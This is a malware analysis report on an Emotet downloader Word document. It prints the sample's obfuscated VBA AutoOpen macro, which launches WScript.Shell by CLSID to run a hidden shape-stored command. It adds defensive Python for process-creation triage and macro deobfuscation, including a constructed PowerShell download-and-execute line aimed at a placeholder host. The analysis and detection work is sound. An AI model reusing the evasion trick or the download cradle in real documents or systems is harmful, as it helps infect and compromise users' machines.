Verdict: MALICIOUS (Risk Score 292)
Malware Insights
MITRE ATT&CK
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains a VBA AutoOpen macro that instantiates WScript.Shell through GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8"), the CLSID of WScript.Shell, instead of CreateObject("WScript.Shell"), so the ProgID never appears in the source. The command string is not in the VBA either: it is assembled at run time from the text of a document shape (Shapes("VbzcjPYLuAc").TextFrame.TextRange.Text) and passed to .Run with a window style of 0, i.e. a hidden window. Everything else in the macro is padding: For Each loops over collections that are never assigned and Select Case blocks whose arms cannot match, filled with arithmetic on randomly named variables. The cmd.exe and PowerShell strings found in the document body (SC_STR_CMD, SC_STR_POWERSHELL) are consistent with that shape holding an obfuscated command that downloads and executes a second-stage payload. The ClamAV detection Doc.Downloader.Emotet-6826433-0 attributes the document to the Emotet family.
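The execution chain the summary describes (Word opens the document, the macro hands a command to WScript.Shell, cmd.exe and PowerShell run it) is easiest to catch on the endpoint as process creation. The following is an added example, not the analyzer's code or anything recovered from this sample: it scores process-creation records for an Office parent spawning a shell, an -EncodedCommand argument (which it decodes from UTF-16LE base64), download/IEX terms in the visible or decoded command line, and a hidden-window flag. The event records, the stage-2 command and the URL example.invalid are constructed for the example, and the scoring thresholds are illustrative.

```python
import base64
import re

# Parent/child pairs that turn "user opened a document" (T1204.002) into script execution (T1059.*).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; these three spellings are the usual ones.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)
DOWNLOAD_TERMS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression|Start-BitsTransfer",
    re.I,
)


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand (base64 over UTF-16LE), or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one process-creation record; the thresholds are illustrative, not a tuned rule."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]
    reasons, score = [], 0
    if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
        reasons.append("office_parent_spawns_shell")
        score += 3
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded_command")
        score += 2
    visible = cmdline if decoded is None else cmdline + " " + decoded   # match on what the shell will actually run
    if DOWNLOAD_TERMS.search(visible):
        reasons.append("download_or_iex")
        score += 3
    if HIDDEN_WINDOW.search(visible):
        reasons.append("hidden_window")
        score += 1
    verdict = "malicious" if score >= 5 else "suspicious" if score >= 2 else "benign"
    return {"verdict": verdict, "score": score, "reasons": reasons, "decoded": decoded}


def encode_for_powershell(script: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE bytes (used here only to build the sample event)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 command and events; example.invalid is a placeholder, not a URL from the sample.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
B64 = encode_for_powershell(STAGE2)
SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1-style records, not taken from this report
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cmd /c powershell -w hidden -enc {B64}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -enc {B64}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage(ev)
        print(r["verdict"], r["score"], r["reasons"], r["decoded"])
```

The second event shows why the decoded command matters: once cmd.exe is the parent, the Office-parent rule no longer fires, and the encoded blob plus the download terms it hides are what keep the verdict at malicious. The fourth event (Word starting the print helper splwow64.exe) is the kind of benign child that a bare "Office spawned a process" rule would page on.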
Heuristics (10)
- ClamAV: Doc.Downloader.Emotet-6826433-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6826433-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID [critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS]: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. The CLSID 72C24DD5-D70A-438B-8A42-98424B88AFB8 is WScript.Shell. Matched line in script:
  Set EGvVqmnoi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + hXuws)
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call. Matched line in script: the same GetObject statement as above.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script:
  Sub AutoOpen()
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag.
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that on this sample a VBA project was recovered (see Extracted artifacts), so this finding duplicates the VBA findings above rather than adding independent evidence.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into drawing markup, consistent with the document containing drawing objects such as the shape the macro reads; it is not a download location or C2 and should not be treated as an IOC.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11470 bytes | 27ada5d9103217c3c967fad4c955583365452c8459ffea93e21ef2909c5e1108 |

Detection (macros.bas):
- ClamAV: No threats found. The Doc.Downloader.Emotet-6826433-0 detection above fired on the document itself; the decoded VBA source on its own did not match.
- Obfuscation or payload: likely. 150 of 223 identifiers look randomly generated (e.g. 'vUOGvVsqYQkM'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vUOGvVsqYQkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each FCWRV In LAjRzopou
pCfLD = 301675374 + Oct(240613372) - 132434226 - CBool(339684900 / 210804011) * 170102131 + Log(jFuLhY - CLng(64540991)) - 303454242 + Hex(OcdzXcAs)
Next
Select Case UzKmD
Case 165258080
wzLRBSpQz = Cos(111302303)
XoGQiAW = 178318481
Case 176927290
LfRjb = Sqr(305831286 / CSng(76527194 - Cos(189554916 - 4228452) + CVSjZwckw + Rnd(255191871 - 82381179)))
HwdDw = Hex(SKQcw)
End Select
On Error Resume Next
For Each MmmizKA In vacCcVd
nCiub = 244060521 + Oct(187397047) - 196860327 - CBool(175861896 / 38583777) * 204485189 + Log(KlzdqU - CLng(308411827)) - 155879221 + Hex(BcNbT)
Next
Select Case cRIwnu
Case 290106110
TzmzbJIEr = Cos(204452538)
SJdwLHbG = 37748190
Case 251637406
RTIazMS = Sqr(60068572 / CSng(289448829 - Cos(148053442 - 118935475) + ifDVTNuz + Rnd(239011291 - 224372867)))
BBzTwpLom = Hex(sjTqBK)
End Select
On Error Resume Next
For Each CzsjcKD In OHiUzN
XIqpNd = 266281548 + Oct(264333268) - 307865533 - CBool(38475851 / 304363518) * 337173226 + Log(hRckEBiBr - CLng(304050170)) - 267533932 + Hex(tumnBhhmh)
Next
Select Case uNHNuO
Case 61158748
iiLLjzftP = Cos(314740007)
RjOCwTiB = 1753309
Case 299576904
MMKQXOd = Sqr(282756525 / CSng(47044264 - Cos(131176314 - 293731233) + QGhiLpIHR + Rnd(246412339 - 48482134)))
kfLLuL = Hex(JEFVwB)
End Select
On Error Resume Next
For Each jWsTqi In YtOnQKWh
qkCpEJtQS = 10628712 + Oct(82710533) - 281265457 - CBool(241772901 / 8385943) * 76407694 + Log(lRNTkW - CLng(181663663)) - 159372986 + Hex(uUbzSoVcl)
Next
Select Case oILPWccBo
Case 142695812
nsCYisINJ = Cos(134480504)
izJoR = 112133663
Case 340653274
rNzIXG = Sqr(175852978 / CSng(12958919 - Cos(283383665 - 284425981) + VmCuG + Rnd(186136172 - 164438706)))
owMPcYf = Hex(LFiKLBb)
End Select
Set QQYoLYm = Shapes("VbzcjPYLuAc")
On Error Resume Next
For Each oowjaP In UMDpvs
vdJqo = 146863966 + Oct(188920957) - 238442961 - CBool(81767433 / 196084313) * 312374942 + Log(jBWjch - CLng(170142077)) - 46274626 + Hex(uTuUR)
Next
Select Case wYjFklSBZ
Case 318879549
zTpEcS = Cos(262280177)
iKzda = 54128665
Case 141191840
EAJPVXXf = Sqr(76385123 / CSng(209253129 - Cos(162212250 - 73977432) + NAzmOkGR + Rnd(333847149 - 121003009)))
GOiow = Hex(GwOzOAPhs)
End Select
On Error Resume Next
For Each lNccXSjm In JSlpODL
MBiOaCiMi = 19839397 + Oct(318963339) - 23607966 - CBool(278331119 / 217150140) * 180257957 + Log(lXwfiwoz - CLng(43632314)) - 295459061 + Hex(jTFKwUJ)
Next
Select Case FtWLK
Case 299716851
sPjifc = Cos(282237953)
EqFfV = 89632345
Case 85483139
HhjCsZsA = Sqr(231479525 / CSng(215344842 - Cos(171984210 - 147250937) + OMnmOGZO + Rnd(158218377 - 90935472)))
pPBTqoots = Hex(OidqXS)
End Select
On Error Resume Next
For Each jEizwv In iJDiJo
oGGRWNq = 265290317 + Oct(174130143) - 38736227 - CBool(207475944 / 213199742) * 295315743 + Log(DrCzuD - CLng(99345511)) - 28598685 + Hex(DTXjP)
Next
Select Case DDaXbnmw
Case 152601869
ZUsdYRS = Cos(14763289)
bRBjOkHjw = 20062266
Case 335417532
ibDXBFIRc = Sqr(112128763 / CSng(298246183 - Cos(204357830 - 164911025) + iWallA + Rnd(137931084 - 243810349)))
SCULnUEq = Hex(YavtpGWMJ)
End Select
rRQifChaX = "" + wCUQpiRt + nSjTm + QQYoLYm.TextFrame.TextRange.Text + iKvrn + YZJusji + YPsUzMp
On Error Resume Next
For Each iPBvE In moIbrh
TnVPf = 159121973 + Oct(231494338) - 108725059 - CBool(19037783 / 182824768) * 169656186 + Log(EIoiWiQVR - CLng(257444527)) - 169709151 + Hex(VuvJFRC)
Next
Select Case BndkTd
Case 147661545
qrfocBz = Cos(16740351)
JlsaLqjNu = 303538427
Case 238905336
ZKlZKtR = Sqr(202480024 / CSng(25950747 - Cos(71743187 - 299549409) + vfZHlw + Rnd(134240324 - 312393927)))
KwjKnpwzW = Hex(jmrQjuO)
End Select
On Error Resume Next
For Each iJWuRwR In UFTGzk
hOpEva = 107854958 + Oct(52158093) - 131142871 - CBool(157360035 / 266187884) * 214814255 + Log(aijruW - CLng(92235657)) - 136109281 + Hex(pTDtcFbB)
Next
Select Case VjiLrP
Case 100220602
wOBCWd = Cos(102471957)
spVcLaWus = 162735837
Case 145979830
CzKjS = Sqr(43176272 / CSng(125000284 - Cos(340189052 - 238988029) + nUcjZz + Rnd(123689376 - 253932604)))
qoukQF = Hex(FuKnTSt)
End Select
On Error Resume Next
For Each OEZau In LNNNBEmJ
rOlaSiham = 70838509 + Oct(171924264) - 176259336 - CBool(201696757 / 24268391) * 12072080 + Log(ocFjWUaiC - CLng(241783416)) - 218518875 + Hex(OLQnn)
Next
Select Case KpuwM
Case 162667536
imPTMhKL = Cos(86090095)
bhcZXo = 51113737
Case 156263697
BbLaumnc = Sqr(297301610 / CSng(84122969 - Cos(37521102 - 276382110) + jArhKK + Rnd(278702609 - 22664827)))
vBzpGKc = Hex(AmafXFSL)
End Select
Set EGvVqmnoi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + hXuws)
On Error Resume Next
For Each TUKSnYVc In obzitsnPM
QlpSmEUqt = 290746760 + Oct(304136878) - 294562253 - CBool(211636014 / 198194967) * 331240857 + Log(JXHmRhcSX - CLng(303281390)) - 284140651 + Hex(ShhtQQHCi)
Next
Select Case YOThc
Case 239796870
vvVkwiPHZ = Cos(225287006)
IWvrNWYL = 72861436
Case 3823143
PXvTHzt = Sqr(128431312 / CSng(233496515 - Cos(35314610 - 292196268) + bwWOWw + Rnd(118649096 - 251935681)))
iYuHFjBzJ = Hex(ZzTfzo)
End Select
On Error Resume Next
For Each MhFcQX In FPNbPz
QkOtoK = 259794615 + Oct(66093701) - 7386960 - CBool(190806275 / 316802824) * 87671085 + Log(WXmIAiC - CLng(240810546)) - 41937445 + Hex(jtIKoMw)
Next
Select Case rCAYPfK
Case 164486515
ZCjcjDwq = Cos(224866048)
EalwjKL = 228428074
Case 340691506
zwzEGEKa = Sqr(328324029 / CSng(51780673 - Cos(49692347 - 325316090) + wchZwAq + Rnd(81766300 - 131704866)))
krvGF = Hex(ODwLtj)
End Select
On Error Resume Next
For Each lmKpG In jkhwz
QZvWjYow = 247117492 + Oct(81562781) - 176006876 - CBool(123321653 / 222047270) * 58244367 + Log(qqBwCXJQh - CLng(220111751)) - 217666814 + Hex(lmiaUY)
Next
Select Case czHCAKHh
Case 112511966
LrHwMqu = Cos(212609982)
wPHJN = 267675120
Case 18782725
CKDmG = Sqr(303259480 / CSng(303610812 - Cos(213513283 - 293311784) + nBnvpsqV + Rnd(274348841 - 167817911)))
YwntUcY = Hex(otNzFE)
End Select
On Error Resume Next
For Each oOBaAjr In KdnPIV
VRTSW = 253415845 + Oct(268170927) - 66467464 - CBool(75567214 / 187655515) * 28363016 + Log(wiPdSm - CLng(41649557)) - 106572089 + Hex(kHSRkkQvK)
Next
Select Case SKEOiAT
Case 332787008
zDqwwYtju = Cos(338438491)
dCFNkKB = 7588389
Case 246351868
YOBBl = Sqr(4702435 / CSng(297557215 - Cos(102596320 - 242568254) + znPQsuJ + Rnd(146681619 - 298596325)))
AVvpwQErd = Hex(zRNobp)
End Select
Const qjJNirLtbpO = 0
On Error Resume Next
For Each OwqOz In fzGZRzND
OCKMTht = 59782432 + Oct(75297727) - 299264385 - CBool(143650373 / 261733698) * 61602191 + Log(CJjfd - CLng(197907749)) - 291754716 + Hex(NEFSdKZZ)
Next
Select Case DLnOZKwb
Case 181180194
piVdAW = Cos(307345394)
PkSkZ = 235570672
Case 167974131
GHADjjmH = Sqr(120458184 / CSng(187319195 - Cos(146922801 - 278482562) + wjECJDK + Rnd(288240117 - 177414363)))
wjFJo = Hex(TlDojE)
End Select
On Error Resume Next
For Each bawvLkWz In zBAoLjkH
KfWBw = 301238152 + Oct(97756670) - 35217728 - CBool(104522115 / 336084185) * 222930911 + Log(ptPndip - CLng(162161332)) - 16954796 + Hex(kTdHFTQl)
Next
Select Case zuAtjO
Case 166221420
EjGUXPO = Cos(51647407)
lAiAv = 227880365
Case 40805875
vCYoovp = Sqr(202165666 / CSng(212867606 - Cos(226500703 - 209950852) + AiZEEkrw + Rnd(110685778 - 84105759)))
PzwiP = Hex(REMtU)
End Select
On Error Resume Next
For Each FWBOUVaKz In TfrGQSjbj
HkOcH = 114069704 + Oct(213405941) - 164674870 - CBool(161671431 / 235454263) * 196619958 + Log(rXGhnLjL - CLng(105981887)) - 52941852 + Hex(JwMUzoWz)
Next
Select Case aQrUIYHC
Case 273247190
lNQno = Cos(135857159)
ifUsUtzDE = 208912385
Case 307431170
ikCjqEafl = Sqr(166291327 / CSng(96601528 - Cos(28980635 - 213858190) + OWTsIXz + Rnd(327031949 - 37558128)))
fuFWrQDtM = Hex(GRjdZ)
End Select
On Error Resume Next
For Each tVkNBMr In aYrOc
OXbEO = 178576198 + Oct(217509874) - 282956324 - CBool(239606978 / 200054190) * 216480648 + Log(dcIzjm - CLng(23869563)) - 293741710 + Hex(wLSwALPt)
Next
Select Case oMtSSJPb
Case 163328791
oClFjojPr = Cos(176445190)
EKkSQMJIN = 100640691
Case 117682192
CqUUKJzjF = Sqr(90737285 / CSng(42246743 - Cos(25698351 - 228014384) + FlHRwX + Rnd(125838045 - 273222842)))
CJACzGSL = Hex(WFiPMUYF)
End Select
On Error Resume Next
For Each pIVmXZd In LAtnvYlj
pvszNmBi = 246273039 + Oct(275650532) - 91063797 - CBool(287932318 / 80164260) * 168206945 + Log(izBRtKQQ - CLng(276317787)) - 269821246 + Hex(KqIfqzXIZ)
Next
Select Case wYcWTDmj
Case 101183216
waDJvWTpY = Cos(167246065)
CIPbLaGz = 108465529
Case 136196241
AEfaZ = Sqr(313951835 / CSng(173041064 - Cos(43418667 - 197487400) + awzjmwjT + Rnd(198019574 - 217735993)))
zEwQMuId = Hex(jwYvawiV)
End Select
EGvVqmnoi.Run! rRQifChaX, qjJNirLtbpO
On Error Resume Next
For Each tnElVWZ In ZmWCGfvY
hjChWG = 242918805 + Oct(21786782) - 286490541 - CBool(231417435 / 328899832) * 124561618 + Log(VHpzjK - CLng(244332093)) - 88810156 + Hex(wcGUIHb)
Next
Select Case SVGEAQ
Case 186307627
XjTiinbTK = Cos(108490891)
NHwkmw = 79343409
Case 238472644
aBwdbZQ = Sqr(184515074 / CSng(81497961 - Cos(72577722 - 142559868) + NCJiRfqJB + Rnd(260506724 - 66116423)))
sOKTkTFnf = Hex(VVhpG)
End Select
End Sub
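The macro above is the sample's own code and is left as extracted. What follows is an added example, not the analyzer's code, of how to reduce such a padded AutoOpen body to its working statements: it drops the control-flow padding (the For Each collections and Select Case selectors are never assigned, so the loops run zero times and no arm matches), starts from the statements that instantiate a COM object, read a document shape or call .Run, and backward-slices in every assignment those statements depend on until nothing changes. It then resolves the GetObject("new:...") CLSID against a small table, pulls the command variable and window-style argument out of the .Run call (tolerating the sample's .Run! spelling), and reports which shape supplies the command text and which names are read but never assigned. SAMPLE_MACRO is an excerpt of the macro above with most padding blocks removed; the WScript.Shell CLSID comes from this page, while the Shell.Application and Scripting.FileSystemObject entries are the standard registered values and are an assumption to confirm on a reference host.

```python
import re

# CLSIDs that give a macro process execution or file-system access.  WScript.Shell is the value on this page;
# Shell.Application and Scripting.FileSystemObject are their standard registered CLSIDs (assumption:
# confirm against HKCR\CLSID on a reference host before using them in a production rule).
DANGEROUS_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
}

# Padding wrapped around every real statement: the For Each collections and Select Case selectors are never
# assigned (Empty), so the loops run zero times and no Case arm matches.  Everything inside them is dead.
NOISE = re.compile(r"^\s*(?:On Error Resume Next|For Each\b.*|Next|Select Case\b.*|Case\b.*|End Select)\s*$", re.I)
HEADER = re.compile(r"^\s*(?:Attribute\b|(?:Private\s+|Public\s+)?Sub\b|End Sub\b)", re.I)
ASSIGN = re.compile(r"^\s*(?:Set\s+|Const\s+)?([A-Za-z_]\w*)\s*=(.*)$", re.I)
SEEDS = re.compile(r"GetObject\(|CreateObject\(|Shapes\(|\.Run\b|\.Exec\b|\bShell\(", re.I)
CLSID = re.compile(r"new:\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
RUN_CALL = re.compile(r"([A-Za-z_]\w*)\.Run!?\s+([A-Za-z_]\w*)\s*,\s*([A-Za-z_]\w*)", re.I)  # sample writes .Run!
SHAPE = re.compile(r'Shapes\("([^"]+)"\)', re.I)
IDENT = re.compile(r"[A-Za-z_]\w*")
BUILTINS = {"set", "const", "getobject", "createobject", "shapes", "shell", "new", "nothing", "empty", "true", "false"}


def refs(line: str) -> list:
    """Identifiers a statement reads: RHS only for assignments; string literals and member names dropped."""
    m = ASSIGN.match(line)
    text = m.group(2) if m else line
    text = re.sub(r'"[^"]*"', '""', text)
    text = re.sub(r"\.\w+!?", "", text)
    return [i for i in IDENT.findall(text) if i.lower() not in BUILTINS]


def slice_macro(src: str) -> dict:
    """Backward-slice a padded AutoOpen body to the statements that feed an execution call."""
    body = [l.rstrip() for l in src.splitlines() if l.strip() and not NOISE.match(l) and not HEADER.match(l)]
    assigns = {}                                   # name -> the statement that assigns it
    for l in body:
        m = ASSIGN.match(l)
        if m:
            assigns[m.group(1)] = l
    live = [l for l in body if SEEDS.search(l)]    # COM instantiation, shape reads, execution calls
    changed = True
    while changed:                                 # pull in the assignments a live line depends on, to a fixpoint
        changed = False
        for l in list(live):
            for name in refs(l):
                target = assigns.get(name)
                if target and target not in live:
                    live.append(target)
                    changed = True
    live.sort(key=body.index)
    # Names read but never assigned are Empty at run time and vanish in string concatenation ("" + x).
    unassigned = sorted({n for l in live for n in refs(l) if n not in assigns})
    com_objects = {c.upper(): DANGEROUS_CLSIDS.get(c.upper(), "unknown") for l in live for c in CLSID.findall(l)}
    run = None
    for l in live:
        m = RUN_CALL.search(l)
        if not m:
            continue
        obj_clsids = CLSID.findall(assigns.get(m.group(1), ""))
        style_m = ASSIGN.match(assigns.get(m.group(3), ""))
        style = int(style_m.group(2)) if style_m and style_m.group(2).strip().isdigit() else None
        run = {"object": DANGEROUS_CLSIDS.get(obj_clsids[0].upper(), "unknown") if obj_clsids else "unknown",
               "command_var": m.group(2),
               "window_style": style}              # WScript.Shell.Run: 0 = hidden window
    shapes = [s for l in live for s in SHAPE.findall(l)]
    return {"live": live, "unassigned": unassigned, "com_objects": com_objects,
            "run": run, "command_source_shape": shapes[0] if shapes else None}


# Excerpt of the macro shown on this page, with most of the padding blocks dropped for brevity.
SAMPLE_MACRO = r'''Attribute VB_Name = "vUOGvVsqYQkM"
Sub AutoOpen()
On Error Resume Next
For Each FCWRV In LAjRzopou
pCfLD = 301675374 + Oct(240613372) - 132434226 - CBool(339684900 / 210804011) * 170102131 + Log(jFuLhY - CLng(64540991)) - 303454242 + Hex(OcdzXcAs)
Next
Select Case UzKmD
Case 165258080
wzLRBSpQz = Cos(111302303)
XoGQiAW = 178318481
Case 176927290
LfRjb = Sqr(305831286 / CSng(76527194 - Cos(189554916 - 4228452) + CVSjZwckw + Rnd(255191871 - 82381179)))
HwdDw = Hex(SKQcw)
End Select
Set QQYoLYm = Shapes("VbzcjPYLuAc")
rRQifChaX = "" + wCUQpiRt + nSjTm + QQYoLYm.TextFrame.TextRange.Text + iKvrn + YZJusji + YPsUzMp
Set EGvVqmnoi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + hXuws)
Const qjJNirLtbpO = 0
EGvVqmnoi.Run! rRQifChaX, qjJNirLtbpO
End Sub
'''

if __name__ == "__main__":
    result = slice_macro(SAMPLE_MACRO)
    for line in result["live"]:
        print(line)
    print(result["com_objects"], result["run"], result["command_source_shape"], result["unassigned"])
```

On the excerpt the slice collapses to five statements: the Shapes lookup, the string assembly, the GetObject call, the Const and the .Run call, with WScript.Shell resolved from the CLSID and a window style of 0. The unassigned names (hXuws, wCUQpiRt, nSjTm, iKvrn, YZJusji, YPsUzMp) are Empty and contribute nothing, so the CLSID string is complete and the command is exactly the shape's text. That also means the command cannot be recovered from macros.bas alone: it has to be read from shape VbzcjPYLuAc in the document body, which is where the summary says the cmd.exe and PowerShell strings were found.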